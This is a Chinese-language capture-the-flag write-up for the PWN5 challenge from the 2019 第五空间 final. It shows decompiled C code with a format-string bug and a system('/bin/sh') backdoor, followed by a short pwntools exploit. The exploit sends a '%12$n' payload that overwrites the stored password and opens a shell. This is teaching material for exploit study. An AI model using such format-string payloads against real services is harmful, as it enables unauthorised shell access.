题目链接:[第五空间2019 决赛]PWN5。
下载附件后,使用 IDA 反编译,定位到 main 函数,如下。
int __cdecl main(int a1)
{
  /*
   * IDA decompilation of the challenge binary (32-bit: __cdecl, esp/ebp
   * stack offsets). The code is unchanged decompiler output; comments
   * mark the security-relevant points a reviewer would raise.
   */
  unsigned int v1; // eax
  int result; // eax
  int fd; // [esp+0h] [ebp-84h]
  char nptr[16]; // [esp+4h] [ebp-80h] BYREF
  char buf[100]; // [esp+14h] [ebp-70h] BYREF
  unsigned int v6; // [esp+78h] [ebp-Ch]
  int *v7; // [esp+7Ch] [ebp-8h]

  v7 = &a1;
  v6 = __readgsdword(0x14u); // x86 stack-protector canary, saved here and re-checked before return
  setvbuf(stdout, 0, 2, 0); // mode 2 is _IONBF on glibc: stdout unbuffered
  v1 = time(0);
  srand(v1); // seeded, but rand() is never called in main
  fd = open("/dev/urandom", 0);
  read(fd, &dword_804C044, 4u); // 4 random bytes become the expected password; open()/read() results are unchecked
  printf("your name:");
  read(0, buf, 0x63u); // 99 bytes into a 100-byte buffer; read() does not NUL-terminate and buf is otherwise uninitialized
  printf("Hello,");
  printf(buf); // VULNERABILITY (CWE-134): user input used directly as the format string; safe form is printf("%s", buf) or fputs(buf, stdout)
  printf("your passwd:");
  read(0, nptr, 0xFu); // 15 bytes into 16-byte nptr; same missing-terminator caveat before atoi()
  if ( atoi(nptr) == dword_804C044 ) // compares against a global in writable memory (the location the writeup's %n write targets)
  {
    puts("ok!!");
    system("/bin/sh"); // shell spawn guarded only by the comparison above
  }
  else
  {
    puts("fail");
  }
  result = 0;
  if ( __readgsdword(0x14u) != v6 )
    sub_80493D0(); // canary mismatch handler; presumably __stack_chk_fail in the original source
  return result;
}
可以看到,`printf(buf)` 直接把用户输入当作格式化字符串,存在格式化字符串漏洞;同时程序中也存在后门(`system("/bin/sh")`)。因此,可以直接使用 "%n" 格式化字符串写,修改内存中 dword_804C044 处的值,如下。
from pwn import *
from pwn import p32, p64, u32, u64
from settings import *
from modules import *


def pwn() -> None:
    """Drive the challenge service with the payload described in the writeup above.

    ``sa``, ``sla`` and ``irt`` are not pwntools top-level names; they are
    presumably thin wrappers (sendafter / sendlineafter / interactive)
    provided by ``settings`` or ``modules`` -- confirm against those files.
    """
    # 0x0804C044 is dword_804C044, the global compared against in main
    sa("your name:", b"aaa%12$n" + p64(0x0804C044))
    sla("your passwd:", "3")
    irt()


pwn()